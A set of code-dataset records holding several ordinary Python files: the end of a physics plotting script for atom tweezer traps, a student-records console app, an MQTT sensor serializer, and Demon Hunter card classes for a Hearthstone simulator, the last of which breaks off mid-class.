ax3.tick_params(axis='y', labelcolor='tab:blue')\r\n ax3.set_xlim(wavels[0]*1e9, wavels[-1]*1e9)\r\n ax3.set_ylim(1, 1e5)\r\n\r\n ax4 = ax3.twinx()\r\n ax4.semilogy(wavels*1e9, ts, color='tab:orange')\r\n ax4.plot(wavels*1e9, np.ones(len(wavels))/2., '--', color='tab:orange', alpha=0.25) # show acceptable region\r\n ax4.set_ylabel('Time in the vibrational ground state (s)', color='tab:orange')\r\n ax4.tick_params(axis='y', labelcolor='tab:orange')\r\n ax4.set_ylim(0.001,10)\r\n plt.tight_layout()\r\n \r\n plt.show()\r\n \r\n \r\nif __name__ == \"__main__\":\r\n # run GUI by passing an arg:\r\n if np.size(sys.argv) > 1 and sys.argv[1] == 'rungui':\r\n runGUI()\r\n sys.exit() # don't run any of the other code below\r\n atom = atom(atm = 'Rb87')\r\n vmfSS(atom)\r\n\r\n # combinedTrap(Cswl = 1064e-9, # wavelength of the Cs tweezer trap in m\r\n # Rbwl = 810e-9, # wavelength of the Rb tweezer trap in m\r\n # power = 5e-3, # power of Cs tweezer beam in W\r\n # Rbpower = 1e-3, # power of Rb tweezer beam in W \r\n # beamwaist = 1e-6)\r\n #check880Trap(wavels=np.linspace(795, 1100, 400)*1e-9, species='Rb')\r\n\r\n # getMFStarkShifts()\r\n # plotStarkShifts(wlrange=[800,1100])\r\n\r\n # for STATES in [[Rb5S, Rb5P],[Cs6S, Cs6P]]:\r\n # plt.figure()\r\n # plt.title(\"AC Stark Shift in \"+STATES[0].X+\"\\nbeam power %.3g mW, beam waist %.3g $\\mu$m\"%(power*1e3,beamwaist*1e6))\r\n # plt.plot(wavels*1e9, STATES[0].acStarkShift(0,0,0,wavels)/kB*1e3, 'tab:blue', label='Ground S$_{1/2}$')\r\n # excited_shift = 0.5*(STATES[1].acStarkShift(0,0,0,wavels,mj=0.5) + STATES[1].acStarkShift(0,0,0,wavels,mj=1.5))\r\n # plt.plot(wavels*1e9, excited_shift/kB*1e3, 'r-.', label='Excited P$_{3/2}$')\r\n # plt.legend()\r\n # plt.ylabel(\"Trap Depth (mK)\")\r\n # plt.xlabel(\"Wavelength (nm)\")\r\n # plt.xlim(wavels[0]*1e9, wavels[-1]*1e9)\r\n # plt.ylim(-5,5)\r\n # plt.plot(wavels*1e9, np.zeros(len(wavels)), 'k', alpha=0.25) # show zero crossing\r\n # plt.show()","sub_path":"AtomFieldInt_Example_functions.py","file_name":"AtomFieldInt_Example_functions.py","file_ext":"py","file_size_in_byte":29696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"3750858","text":"'''\n5th STD TO BOARD EXAMINATION Student management application program\n\nAuthors:\n Vidyadhar Sharma \n Sai Samyam v\n'''\n\nfrom studentManager import Student,pprint,json\nfrom tabulate import tabulate\n\nprint('-'*40,'\\n *************EL ALUMNO************* \\n','-'*39)\n\ndata= {}# The dictionary used \ntry:\n with open('StudentDB.json') as file:\n data.update(json.load(file)) \nexcept:\n pass \n \n# the while loop 
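# --- Editor's addition (illustrative note, not part of the original file). ---
# json.dump/json.load round-trip all dictionary keys as strings, which is why
# the student database below stores and looks up roll numbers as str: an int
# key written to StudentDB.json would come back as a string and stop matching.
import json
reloaded = json.loads(json.dumps({101: "Ada"}))
print(reloaded)           # {'101': 'Ada'} -- the int key became a string
print(101 in reloaded)    # False
print("101" in reloaded)  # True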
that keeps repeating the functions \nwhile True:\n # the options are displayed one below the other \n print(tabulate([(1,'ENTER STUDENT DETAILS',),(2,'DISPLAY ALL THE STUDENT DETAILS',),(3,'SEARCH STUDENT DETAILS',),(4,'DELETE STUDENT DETAILS',),(5,'UPDATE STUDENT DETAILS AFTER REVALUATION',),(6,'SAVE AND EXIT')]))\n print('\\n What option number would you like to choose?: ')\n # the user chooses the suitable option to perform the desired function \n ch = int(input('\\n Your choice: '))\n\n if ch == 1:\n # the student detail inputs \n # roll numbers are stored as str keys: json.dump/json.load turn all\n # keys into strings, so int keys would stop matching after a reload\n admittee = Student()\n data[str(admittee.rollno)] = {'a.NAME: ':admittee.name,'b.ROLL NUMBER: ':admittee.rollno,'c.MATHEMATICS: ':admittee.math,'d.SCIENCE: ':admittee.science,'e.SOCIAL SCIENCE: ':admittee.socialscience,'f.ENGLISH: ':admittee.english,'g.LANGUAGE: ':admittee.language,'h.TOTAL: ':admittee.total,'i.PERCENTAGE: ':str(admittee.percentage) + '%'}\n \n elif ch == 2:\n # displays the data in the form of a dictionary \n print('\\n Details of all the entered students:')\n pprint(data)\n \n elif ch == 3:\n # allows you to pick the student whose data needs to be displayed \n rn = input('Enter Roll number of student for his/her details: ')\n pprint(data[rn])\n \n elif ch == 4:\n # deletes the details of a particular student\n rn = input('Enter roll number of student to delete his/her details: ')\n del data[rn]\n\n elif ch == 5: \n # updates the details of the student\n rn = input('Enter roll number of student whose revaluation is completed: ')\n del data[rn]\n admittee = Student()\n data[str(admittee.rollno)] = {'a.NAME: ':admittee.name,'b.ROLL NUMBER: ':admittee.rollno,'c.MATHEMATICS: ':admittee.math,'d.SCIENCE: ':admittee.science,'e.SOCIAL SCIENCE: ':admittee.socialscience,'f.ENGLISH: ':admittee.english,'g.LANGUAGE: ':admittee.language,'h.TOTAL: ':admittee.total,'i.PERCENTAGE: ':str(admittee.percentage) + '%'}\n \n\n\n elif ch == 6:\n # saves the data\n with open('StudentDB.json','w') as file:\n json.dump(data, file)\n print('THANK YOU')\n # breaks the loop \n break\n \n else: \n print('Try Again') \n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"215517718","text":"import json\nimport logging\nimport traceback\n\n# module-level imports: class-body imports are not visible as bare names\n# inside methods, so the switch dict in __init__ would raise NameError\nfrom i2c import read_arduino\nfrom wire1 import read_value\nfrom do import read_do\n\n\nclass sensor:\n def __formatter(self, value, topic):\n print({\"topic\": topic, \"status\": \"sending\", \"value\": str(value)})\n return json.dumps({\"status\": \"sending\", \"value\": str(value)})\n\n def __serialize(self, mqtt_send, sensor_function, topic, slave_addr, sensor_type):\n def get_then_send():\n mqtt_send(self.__formatter(\n sensor_function(slave_addr, sensor_type), topic))\n return get_then_send\n\n def __init__(self, url, sensor_parameters):\n from mqtt import mqtt\n\n logging.basicConfig(filename=\"error.log\")\n\n sensor_type = sensor_parameters[3]\n slave_addr = sensor_parameters[2]\n sensor_function = sensor_parameters[1]\n topic = sensor_parameters[0]\n switch = {\n \"read_arduino\": read_arduino,\n \"read_value\": read_value,\n \"read_do\": read_do\n }\n self.get_send = self.__serialize(\n mqtt(topic, url).send,\n switch.get(sensor_function),\n topic,\n slave_addr,\n sensor_type\n )\n\n def process(self):\n try:\n self.get_send()\n except Exception as e:\n logging.error(traceback.format_exc())\n 
print(e)\n","sub_path":"sensor_serializer.py","file_name":"sensor_serializer.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"291364437","text":"from CardTypes import *\nfrom Triggers_Auras import *\nfrom numpy.random import choice as npchoice\nfrom numpy.random import randint as nprandint\nfrom numpy.random import shuffle as npshuffle\nfrom numpy import inf as npinf\n\nfrom Basic import IllidariInitiate\n\n\"\"\"Demon Hunter Year of the Dragon cards\"\"\"\n\n\"\"\"Mana 0 cards\"\"\"\nclass Blur(Spell):\n\tClass, name = \"Demon Hunter\", \"Blur\"\n\trequireTarget, mana = False, 0\n\tindex = \"DHInitiate~Demon Hunter~Spell~0~Blur\"\n\tdescription = \"Your hero can't take damage this turn\"\n\t#Unclear how this should resolve against hero-damage redirection effects (e.g. Bolf Ramshield).\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tBlur_Effect(self.Game, self.ID).connect()\n\t\treturn None\n\t\t\nclass Blur_Effect:\n\tdef __init__(self, Game, ID):\n\t\tself.Game, self.ID = Game, ID\n\t\tself.signals = [\"FinalDmgonHero?\"]\n\t\tself.temp = False\n\t\t\n\tdef connect(self):\n\t\ttry: self.Game.trigsBoard[self.ID][\"FinalDmgonHero?\"].append(self)\n\t\texcept: self.Game.trigsBoard[self.ID][\"FinalDmgonHero?\"] = [self]\n\t\tself.Game.turnEndTrigger.append(self)\n\t\t\n\tdef disconnect(self):\n\t\ttry: self.Game.trigsBoard[self.ID][\"FinalDmgonHero?\"].remove(self)\n\t\texcept: pass\n\t\ttry: self.Game.turnEndTrigger.remove(self)\n\t\texcept: pass\n\t\t#number here is a list that holds the damage to be processed\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\treturn target.ID == self.ID and target.onBoard\n\t\t\n\tdef trigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tif self.canTrigger(signal, ID, subject, target, number, comment):\n\t\t\tif self.Game.GUI: self.Game.GUI.showOffBoardTrig(Blur(self.Game, self.ID), linger=False)\n\t\t\tself.effect(signal, ID, subject, target, number, comment)\n\t\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tnumber[0] = 0\n\t\t\n\tdef turnEndTrigger(self):\n\t\tself.disconnect()\n\t\t\n\tdef createCopy(self, game): #not a pure turn-end trigger, so a full createCopy is needed\n\t\tif self not in game.copiedObjs: #this trigger hasn't been copied yet\n\t\t\ttrigCopy = type(self)(game, self.ID)\n\t\t\tgame.copiedObjs[self] = trigCopy\n\t\t\treturn trigCopy\n\t\telse: #if a trigger has been copied, its carrier has been copied as well\n\t\t\treturn game.copiedObjs[self]\n\t\t\t\n\t\t\t\nclass TwinSlice(Spell):\n\tClass, name = \"Demon Hunter\", \"Twin Slice\"\n\trequireTarget, mana = False, 1\n\tindex = \"DHInitiate~Demon Hunter~Spell~1~Twin Slice\"\n\tdescription = \"Give your hero +2 Attack this turn. 
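# --- Editor's addition (illustrative sketch, not part of the original file). ---
# Blur_Effect above cancels incoming hero damage by assigning number[0] = 0.
# Passing the pending damage as a one-element list lets every handler in the
# trigger chain read and rewrite the same value -- a lightweight out-parameter:
def halve_damage(number):
    number[0] //= 2

def negate_damage(number):   # what Blur's one-turn immunity amounts to
    number[0] = 0

pending = [8]                # damage about to be dealt to the hero
halve_damage(pending)
negate_damage(pending)
print(pending[0])            # 0 -- both handlers saw the shared value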
Add 'Second Slice' to your hand\"\n\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tself.Game.heroes[self.ID].gainAttack(2)\n\t\tself.Game.Hand_Deck.addCardtoHand(SecondSlice(self.Game, self.ID), self.ID)\n\t\treturn None\n\t\t\nclass SecondSlice(Spell):\n\tClass, name = \"Demon Hunter\", \"Second Slice\"\n\trequireTarget, mana = False, 1\n\tindex = \"DHInitiate~Demon Hunter~Spell~1~Second Slice~Uncollectible\"\n\tdescription = \"Give your hero +2 Attack this turn\"\n\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tself.Game.heroes[self.ID].gainAttack(2)\n\t\treturn None\n\t\t\n\t\t\n\"\"\"Mana 1 cards\"\"\"\nclass Battlefiend(Minion):\n\tClass, race, name = \"Demon Hunter\", \"Demon\", \"Battlefiend\"\n\tmana, attack, health = 1, 1, 2\n\tindex = \"DHInitiate~Demon Hunter~Minion~1~1~2~Demon~Battlefiend\"\n\trequireTarget, keyWord, description = False, \"\", \"After your hero attacks, gain +1 Attack\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.trigsBoard = [Trig_Battlefiend(self)]\n\t\t\nclass Trig_Battlefiend(TrigBoard):\n\tdef __init__(self, entity):\n\t\tself.blank_init(entity, [\"HeroAttackedMinion\", \"HeroAttackedHero\"])\n\t\t\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\treturn self.entity.onBoard and subject == self.entity.Game.heroes[self.entity.ID]\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"在你的英雄攻击后,获得+1攻击力\" if CHN else \"After your hero attacks, gain +1 Attack\"\n\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tself.entity.buffDebuff(1, 0)\n\t\t\n\t\t\nclass ConsumeMagic(Spell):\n\tClass, name = \"Demon Hunter\", \"Consume Magic\"\n\trequireTarget, mana = True, 1\n\tindex = \"DHInitiate~Demon Hunter~Spell~1~Consume Magic~Outcast\"\n\tdescription = \"Silence an enemy minion. 
Outcast: Draw a card\"\n\tdef available(self):\n\t\treturn self.selectableEnemyMinionExists()\n\t\t\n\tdef targetCorrect(self, target, choice=0):\n\t\treturn target.type == \"Minion\" and target.ID != self.ID and target.onBoard\n\t\t\n\tdef effectCanTrigger(self):\n\t\tself.effectViable = self.Game.Hand_Deck.outcastcanTrigger(self)\n\t\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tif target:\n\t\t\ttarget.getsSilenced()\n\t\tif posinHand == 0 or posinHand == -1:\n\t\t\tself.Game.Hand_Deck.drawCard(self.ID)\n\t\treturn target\n\t\t\n\t\t\nclass ManaBurn(Spell):\n\tClass, name = \"Demon Hunter\", \"Mana Burn\"\n\trequireTarget, mana = False, 1\n\tindex = \"DHInitiate~Demon Hunter~Spell~1~Mana Burn\"\n\tdescription = \"Your opponent has 2 fewer Mana Crystals next turn\"\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tself.Game.Manas.manas_withheld[3-self.ID] += 2\n\t\tself.Game.turnStartTrigger.append(TwoFewerManaEffectRemoved(self.Game, 3-self.ID))\n\t\treturn None\n\t\t\n#不知道这个少两个法力水晶是让它们空两个还是直接少真实的水晶\nclass TwoFewerManaEffectRemoved:\n\tdef __init__(self, Game, ID):\n\t\tself.Game, self.ID = Game, ID\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"玩家%d的下个回合减少2个法力水晶\"%self.ID if CHN \\\n\t\t\t\telse \"Player %d's next turn has 2 fewer Mana Crystals\"%self.ID\n\t\t\t\t\n\tdef turnStartTrigger(self):\n\t\tself.Game.Manas.manas_withheld[self.ID] -= 2\n\t\ttry: self.Game.turnStartTrigger.remove(self)\n\t\texcept: pass\n\t\t\n\tdef createCopy(self, game):\n\t\treturn type(self)(game, self.ID)\n\t\t\n\t\t\nclass UrzulHorror(Minion):\n\tClass, race, name = \"Demon Hunter\", \"Demon\", \"Ur'zul Horror\"\n\tmana, attack, health = 1, 2, 1\n\tindex = \"DHInitiate~Demon Hunter~Minion~1~2~1~Demon~Ur'zul Horror~Deathrattle\"\n\trequireTarget, keyWord, description = False, \"\", \"Deathrattle: Add a 2/1 Lost Soul to your hand\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.deathrattles = [AddaLostSoultoYourHand(self)]\n\t\t\nclass AddaLostSoultoYourHand(Deathrattle_Minion):\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tself.entity.Game.Hand_Deck.addCardtoHand(LostSoul, self.entity.ID, \"type\")\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"亡语:将一张2/1的“迷失之魂”置入你的手牌\" if CHN else \"Deathrattle: Add a 2/1 Lost Soul to your hand\"\n\t\t\nclass LostSoul(Minion):\n\tClass, race, name = \"Demon Hunter\", \"\", \"Lost Soul\"\n\tmana, attack, health = 1, 2, 1\n\tindex = \"DHInitiate~Demon Hunter~Minion~1~2~1~None~Lost Soul~Uncollectible\"\n\trequireTarget, keyWord, description = False, \"\", \"\"\n\t\n\t\n\"\"\"Mana 2 cards\"\"\"\nclass BladeDance(Spell):\n\tClass, name = \"Demon Hunter\", \"Blade Dance\"\n\trequireTarget, mana = False, 2\n\tindex = \"DHInitiate~Demon Hunter~Spell~2~Blade Dance\"\n\tdescription = \"Deal damage equal to your hero's Attack to 3 random enemy minions\"\n\tdef available(self):\n\t\treturn self.Game.heroes[self.ID].attack > 0\n\t\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tdamage = (self.Game.heroes[self.ID].attack + self.countSpellDamage()) * (2 ** self.countDamageDouble())\n\t\tcurGame = self.Game\n\t\tminions = curGame.minionsAlive(3-self.ID)\n\t\tif damage > 0 and minions:\n\t\t\tif curGame.mode == 0:\n\t\t\t\tif curGame.guides:\n\t\t\t\t\tminions = [curGame.minions[3-self.ID][i] for i in curGame.guides.pop(0)]\n\t\t\t\telse:\n\t\t\t\t\tminions = list(npchoice(minions, min(3, len(minions)), 
replace=False))\n\t\t\t\t\tcurGame.fixedGuides.append(tuple([minion.pos for minion in minions]))\n\t\t\t\tself.dealsAOE(minions, [damage]*len(minions))\n\t\treturn None\n\t\t\n\t\t\nclass FeastofSouls(Spell):\n\tClass, name = \"Demon Hunter\", \"Feast of Souls\"\n\trequireTarget, mana = False, 2\n\tindex = \"DHInitiate~Demon Hunter~Spell~2~Feast of Souls\"\n\tdescription = \"Draw a card for each friendly minion that died this turn\"\n\tdef effectCanTrigger(self):\n\t\tself.effectViable = self.Game.Counters.minionsDiedThisTurn[self.ID] != []\n\t\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tnum = len(self.Game.Counters.minionsDiedThisTurn[self.ID])\n\t\tfor i in range(num): self.Game.Hand_Deck.drawCard(self.ID)\n\t\treturn None\n\t\t\n\t\t\nclass Umberwing(Weapon):\n\tClass, name, description = \"Demon Hunter\", \"Umberwing\", \"Battlecry: Summon two 1/1 Felwings\"\n\tmana, attack, durability = 2, 1, 2\n\tindex = \"DHInitiate~Demon Hunter~Weapon~2~1~2~Umberwing~Battlecry\"\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tself.Game.summon([Felwing(self.Game, self.ID) for i in range(2)], (-1, \"totheRightEnd\"), self.ID)\n\t\treturn None\n\t\t\nclass Felwing(Minion):\n\tClass, race, name = \"Demon Hunter\", \"Demon\", \"Felwing\"\n\tmana, attack, health = 1, 1, 1\n\tindex = \"DHInitiate~Demon Hunter~Minion~1~1~1~Demon~Felwing~Uncollectible\"\n\trequireTarget, keyWord, description = False, \"\", \"\"\n\t\n\t\n\"\"\"Mana 3 cards\"\"\"\nclass AltruistheOutcast(Minion):\n\tClass, race, name = \"Demon Hunter\", \"\", \"Altruis the Outcast\"\n\tmana, attack, health = 4, 4, 2\n\tindex = \"DHInitiate~Demon Hunter~Minion~4~4~2~None~Altruis the Outcast~Legendary\"\n\trequireTarget, keyWord, description = False, \"\", \"After you play the left- or right-most card in your hand, deal 1 damage to all enemies\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.trigsBoard = [Trig_AltruistheOutcast(self)]\n\t\t\nclass Trig_AltruistheOutcast(TrigBoard):\n\tdef __init__(self, entity):\n\t\tself.blank_init(entity, [\"MinionBeenPlayed\", \"SpellBeenPlayed\", \"WeaponBeenPlayed\", \"HeroCardBeenPlayed\"])\n\t\t\n\t#The comment passed is the position of card in hand when they are played.\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\treturn self.entity.onBoard and subject.ID == self.entity.ID and subject != self.entity and (comment == -1 or comment == 0)\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"在你使用最左或最右的一张手牌后,对所有敌人造成1点伤害\" if CHN \\\n\t\t\t\telse \"After you play the left- or right-most card in your hand, deal 1 damage to all enemies\"\n\t\t\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\ttargets = [self.entity.Game.heroes[3-self.entity.ID]] + self.entity.Game.minionsonBoard(3-self.entity.ID)\n\t\tself.entity.dealsAOE(targets, [1 for enemy in targets])\n\t\t\n\t\t\nclass EyeBeam(Spell):\n\tClass, name = \"Demon Hunter\", \"Eye Beam\"\n\trequireTarget, mana = True, 3\n\tindex = \"DHInitiate~Demon Hunter~Spell~3~Eye Beam~Outcast\"\n\tdescription = \"Lifesteal. Deal 3 damage to a minion. 
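# --- Editor's addition (illustrative sketch, not part of the original file). ---
# Every Outcast effect in this file keys off the same test used by Eye Beam's
# selfManaChange below: the bonus applies only while the card sits at either
# end of the hand. In isolation:
def is_outcast_position(hand, card):
    """True when `card` is the left- or right-most card in `hand`."""
    pos = hand.index(card)
    return pos == 0 or pos == len(hand) - 1

hand = ["Chaos Strike", "Eye Beam", "Metamorphosis"]   # hypothetical hand
print(is_outcast_position(hand, "Eye Beam"))           # False (middle of hand)
print(is_outcast_position(hand, "Metamorphosis"))      # True (right-most)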
Outcast: This costs (1)\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.keyWords[\"Lifesteal\"] = 1\n\t\tself.trigsHand = [Trig_EyeBeam(self)]\n\t\t\n\tdef available(self):\n\t\treturn self.selectableMinionExists()\n\t\t\n\tdef targetCorrect(self, target, choice=0):\n\t\treturn target.type == \"Minion\" and target.onBoard\n\t\t\n\tdef effectCanTrigger(self):\n\t\tself.effectViable = self.Game.Hand_Deck.outcastcanTrigger(self)\n\t\t\n\tdef selfManaChange(self):\n\t\tif self.inHand:\n\t\t\tposinHand = self.Game.Hand_Deck.hands[self.ID].index(self)\n\t\t\tif posinHand == 0 or posinHand == len(self.Game.Hand_Deck.hands[self.ID]) - 1:\n\t\t\t\tself.mana = 1\n\t\t\t\t\n\tdef text(self, CHN):\n\t\tdamage = (3 + self.countSpellDamage()) * (2 ** self.countDamageDouble())\n\t\treturn \"吸血。对一个随从造成%d点伤害。流放:法力值消耗为(1)点\"%damage if CHN \\\n\t\t\t\telse \"Lifesteal. Deal %d damage to a minion. Outcast: This costs (1)\"%damage\n\t\t\t\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tif target:\n\t\t\tdamage = (3 + self.countSpellDamage()) * (2 ** self.countDamageDouble())\n\t\t\tself.dealsDamage(target, damage)\n\t\treturn target\n\t\t\nclass Trig_EyeBeam(TrigHand):\n\tdef __init__(self, entity):\n\t\tself.blank_init(entity, [\"CardLeavesHand\", \"CardEntersHand\"])\n\t\t\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tif self.entity.inHand:\n\t\t\tcard = target[0] if signal == \"CardEntersHand\" else target\n\t\t\treturn card.ID == self.entity.ID\n\t\treturn False\n\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tself.entity.Game.Manas.calcMana_Single(self.entity)\n\t\t\n\t\t\nclass WrathscaleNaga(Minion):\n\tClass, race, name = \"Demon Hunter\", \"\", \"Wrathscale Naga\"\n\tmana, attack, health = 3, 3, 1\n\tindex = \"DHInitiate~Demon Hunter~Minion~3~3~1~None~Wrathscale Naga\"\n\trequireTarget, keyWord, description = False, \"\", \"After a friendly minion dies, deal 3 damage to a random enemy\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.trigsBoard = [Trig_WrathscaleNaga(self)]\n\t\t\nclass Trig_WrathscaleNaga(TrigBoard):\n\tdef __init__(self, entity):\n\t\tself.blank_init(entity, [\"MinionDied\"])\n\t\t\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\treturn self.entity.onBoard and target != self.entity and target.ID == self.entity.ID #Technically, minion has to disappear before dies. 
But just in case.\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"在一个友方随从死亡后,随从对一个敌人造成3点伤害\" if CHN else \"After a friendly minion dies, deal 3 damage to a random enemy\"\n\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\tcurGame = self.entity.Game\n\t\tif curGame.mode == 0:\n\t\t\tenemy = None\n\t\t\tif curGame.guides:\n\t\t\t\ti, where = curGame.guides.pop(0)\n\t\t\t\tif where: enemy = curGame.find(i, where)\n\t\t\telse:\n\t\t\t\ttargets = curGame.charsAlive(3-self.entity.ID)\n\t\t\t\tif targets:\n\t\t\t\t\tenemy = npchoice(targets)\n\t\t\t\t\tcurGame.fixedGuides.append((enemy.pos, enemy.type+str(enemy.ID)))\n\t\t\t\telse: curGame.fixedGuides.append((0, \"\"))\n\t\t\tif enemy:\n\t\t\t\tself.entity.dealsDamage(enemy, 3) #3 damage, matching the card text and description above\n\t\t\t\t\n\"\"\"Mana 4 cards\"\"\"\nclass IllidariFelblade(Minion):\n\tClass, race, name = \"Demon Hunter\", \"\", \"Illidari Felblade\"\n\tmana, attack, health = 4, 5, 3\n\tindex = \"DHInitiate~Demon Hunter~Minion~4~5~3~None~Illidari Felblade~Rush~Outcast\"\n\trequireTarget, keyWord, description = False, \"Rush\", \"Rush. Outcast: Gain Immune this turn\"\n\t\n\tdef effectCanTrigger(self):\n\t\tself.effectViable = self.Game.Hand_Deck.outcastcanTrigger(self)\n\t\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tif posinHand == 0 or posinHand == -1:\n\t\t\tself.status[\"Immune\"] = 1\n\t\treturn None\n\t\t\n\t\t\nclass RagingFelscreamer(Minion):\n\tClass, race, name = \"Demon Hunter\", \"\", \"Raging Felscreamer\"\n\tmana, attack, health = 4, 4, 4\n\tindex = \"DHInitiate~Demon Hunter~Minion~4~4~4~None~Raging Felscreamer~Battlecry\"\n\trequireTarget, keyWord, description = False, \"\", \"Battlecry: The next Demon you play costs (2) less\"\n\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\ttempAura = YourNextDemonCosts2Less(self.Game, self.ID)\n\t\tself.Game.Manas.CardAuras.append(tempAura)\n\t\ttempAura.auraAppears()\n\t\treturn None\n\t\t\nclass YourNextDemonCosts2Less(TempManaEffect):\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID, -2, -1)\n\t\tself.temporary = False #does not expire at end of turn; it lasts until that Demon is played\n\t\tself.auraAffected = []\n\t\t\n\tdef applicable(self, target):\n\t\treturn target.ID == self.ID and target.type == \"Minion\" and \"Demon\" in target.race\n\t\t\n\tdef selfCopy(self, game):\n\t\treturn type(self)(game, self.ID)\n\t\t\n\t\t\nclass SoulSplit(Spell):\n\tClass, name = \"Demon Hunter\", \"Soul Split\"\n\trequireTarget, mana = True, 4\n\tindex = \"DHInitiate~Demon Hunter~Spell~4~Soul Split\"\n\tdescription = \"Choose a friendly Demon. 
Summon a copy of it\"\n\t\n\tdef available(self):\n\t\treturn self.selectableFriendlyMinionExists()\n\t\t\n\tdef targetCorrect(self, target, choice=0):\n\t\treturn target.type == \"Minion\" and \"Demon\" in target.race and target.ID == self.ID and target.onBoard\n\t\t\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tif target and self.Game.space(self.ID) > 0:\n\t\t\tCopy = target.selfCopy(self.ID) if target.onBoard else type(target)(self.Game, self.ID)\n\t\t\tself.Game.summon(Copy, target.pos+1, self.ID)\n\t\treturn target\n\t\t\n\"\"\"Mana 5 cards\"\"\"\nclass CommandtheIllidari(Spell):\n\tClass, name = \"Demon Hunter\", \"Command the Illidari\"\n\trequireTarget, mana = False, 5\n\tindex = \"DHInitiate~Demon Hunter~Spell~5~Command the Illidari\"\n\tdescription = \"Summon six 1/1 Illidari with Rush\"\n\tdef whenEffective(self, target=None, comment=\"\", choice=0, posinHand=-2):\n\t\tself.Game.summon([IllidariInitiate(self.Game, self.ID) for i in range(6)], (-1, \"totheRightEnd\"), self.ID)\n\t\treturn None\n\t\t\nclass WrathspikeBrute(Minion):\n\tClass, race, name = \"Demon Hunter\", \"Demon\", \"Wrathspike Brute\"\n\tmana, attack, health = 5, 2, 6\n\tindex = \"DHInitiate~Demon Hunter~Minion~5~2~6~Demon~Wrathspike Brute~Taunt\"\n\trequireTarget, keyWord, description = False, \"Taunt\", \"Taunt. After this is attacked, deal 1 damage to all enemies\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.trigsBoard = [Trig_WrathspikeBrute(self)]\n\t\t\nclass Trig_WrathspikeBrute(TrigBoard):\n\tdef __init__(self, entity):\n\t\tself.blank_init(entity, [\"MinionAttackedMinion\", \"HeroAttackedMinion\"])\n\t\t\n\tdef canTrigger(self, signal, ID, subject, target, number, comment, choice=0):\n\t\treturn self.entity.onBoard and target == self.entity\n\t\t\n\tdef text(self, CHN):\n\t\treturn \"在该随从被攻击后,对所有敌人造成1点伤害\" if CHN else \"After this is attacked, deal 1 damage to all enemies\"\n\t\t\n\tdef effect(self, signal, ID, subject, target, number, comment, choice=0):\n\t\ttargets = [self.entity.Game.heroes[3-self.entity.ID]] + self.entity.Game.minionsonBoard(3-self.entity.ID)\n\t\tself.entity.dealsAOE(targets, [1 for minion in targets])\n\t\t\n\"\"\"Mana 7 cards\"\"\"\nclass Flamereaper(Weapon):\n\tClass, name, description = \"Demon Hunter\", \"Flamereaper\", \"Also damages the minions next to whomever your hero attacks\"\n\tmana, attack, durability = 7, 4 ,3\n\tindex = \"DHInitiate~Demon Hunter~Weapon~7~4~3~Flamereaper\"\n\tdef __init__(self, Game, ID):\n\t\tself.blank_init(Game, ID)\n\t\tself.marks[\"Sweep\"] = 1\n\t\t\n\"\"\"Mana 8 cards\"\"\"\nclass HulkingOverfiend(Minion):\n\tClass, race, name = \"Demon Hunter\", \"Demon\", \"Hulking Overfiend\"\n\tmana, attack, health = 8, 5, 10\n\tindex = \"DHInitiate~Demon Hunter~Minion~8~5~10~Demon~Hulking Overfiend~Rush\"\n\trequireTarget, keyWord, description = False, \"Rush\", \"Rush. 
